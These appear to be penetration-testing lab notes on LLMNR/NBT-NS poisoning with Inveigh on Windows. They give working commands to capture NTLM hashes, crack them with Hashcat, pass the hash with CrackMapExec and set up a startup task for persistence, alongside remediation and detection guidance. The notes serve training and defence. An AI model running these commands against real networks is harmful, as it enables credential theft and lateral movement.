4.LLMNR-NBT-NS Poisoning - from Windows
1. Inveigh Overview:
Purpose: A Windows-based tool for LLMNR/NBT-NS poisoning, similar to Responder.
Languages: Written in PowerShell and C#.
Protocols: Supports LLMNR, DNS, mDNS, NBNS, DHCPv6, ICMPv6, HTTP, HTTPS, SMB, LDAP, WebDAV, and Proxy Auth.
Availability: Found in the
C:\Toolsdirectory on the provided Windows attack host.Versions:
PowerShell (original, no longer updated)
C# (InveighZero, maintained by the author)
2. Using Inveigh (PowerShell):
Importing the Module:
Import-Module .\Inveigh.ps1Listing Parameters:
(Get-Command Invoke-Inveigh).ParametersRunning Inveigh:
Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput YEnables NBNS spoofing, console output, and file output.
Displays enabled/disabled options, captured LLMNR and mDNS requests, SMB negotiation, and NTLM challenges.
Saves output to the
C:\Toolsdirectory.
Stopping Inveigh (PowerShell):
Stop-Inveigh3. Using Inveigh (C# - InveighZero):
Execution:
.\Inveigh.exeOutput:
Displays enabled/disabled options.
Indicates successful and failed listeners.
Captures LLMNR requests.
Interactive Console:
Press
ESCto enter the interactive console.Use the
HELPcommand for a list of available console commands.
Common Commands:
GET NTLMV2UNIQUE- Displays unique captured NTLMv2 hashes.GET NTLMV2USERNAMES- Displays captured usernames.
4. Inveigh Console Commands:
GET CONSOLEGET DHCPv6LeasesGET LOGGET NTLMV1GET NTLMV2GET NTLMV1UNIQUEGET NTLMV2UNIQUEGET NTLMV1USERNAMESGET NTLMV2USERNAMESGET CLEARTEXTGET CLEARTEXTUNIQUEGET REPLYTODOMAINSGET REPLYTOHOSTSGET REPLYTOIPSGET REPLYTOMACSGET IGNOREDOMAINSGET IGNOREHOSTSGET IGNOREIPSGET IGNOREMACSSET CONSOLEHISTORYRESUMESTOP
5. Remediation:
Disable LLMNR:
Group Policy:
Computer Configuration -> Administrative Templates -> Network -> DNS Client -> "Turn OFF Multicast Name Resolution."
Disable NBT-NS:
Navigate to:
Network and Sharing Center -> Change adapter settings -> Adapter properties -> Internet Protocol Version 4 (TCP/IPv4) -> Advanced -> WINS -> Disable NetBIOS over TCP/IP.
PowerShell GPO Startup Script:
$regkey = "HKLM:SYSTEM\CurrentControlSet\services\NetBT\Parameters\Interfaces"
Get-ChildItem $regkey |foreach { Set-ItemProperty -Path "$regkey\$($_.pschildname)" -Name NetbiosOptions -Value 2 -Verbose}Deploy using Group Policy Management.
Other Mitigations:
Filtering network traffic.
Enabling SMB Signing.
Using network intrusion detection and prevention systems.
Implementing network segmentation.
6. Detection:
Honeypotting: Inject LLMNR/NBT-NS requests for non-existent hosts.
Traffic Monitoring: Monitor ports UDP 5355 and 137.
Event Log Monitoring: Focus on Event IDs
4697and7045.Registry Monitoring:
HKLM\Software\Policies\Microsoft\Windows NT\DNSClient\EnableMulticast(0 = disabled)
Sysmon: Monitor for suspicious process creations or network connections.
7. Post-Capture Actions:
Enumeration:
Use BloodHound for analyzing captured hashes.
Hash Cracking with Hashcat:
hashcat -m 5600 captured_hashes.txt rockyou.txt --forceIdentify Hash Types:
hashid captured_hash.txtUsing CrackMapExec for Exploitation:
crackmapexec smb <target-ip> -u <username> -H <hash>Password Spraying:
Employ password spraying techniques if hash cracking is unsuccessful.
8. Automation Example (Scheduled Task for Persistence):
$Action = New-ScheduledTaskAction -Execute 'powershell.exe' -Argument '-File "C:\Tools\Inveigh.ps1"'
$Trigger = New-ScheduledTaskTrigger -AtStartup
Register-ScheduledTask -Action $Action -Trigger $Trigger -TaskName "InveighPersistence" -Description "Auto-start Inveigh for LLMNR/NBT-NS Poisoning"9. Real-World Workflow Example:
Launch Inveigh to capture hashes.
Use Hashcat to crack captured NTLMv2 hashes.
Attempt lateral movement using cracked credentials with CrackMapExec.
Continue enumeration or privilege escalation as needed.
10. Defensive Recommendation Summary:
Disable LLMNR and NBT-NS protocols.
Enforce SMB signing.
Monitor network traffic for suspicious poisoning attempts.
Implement strict network segmentation and authentication controls.
Last updated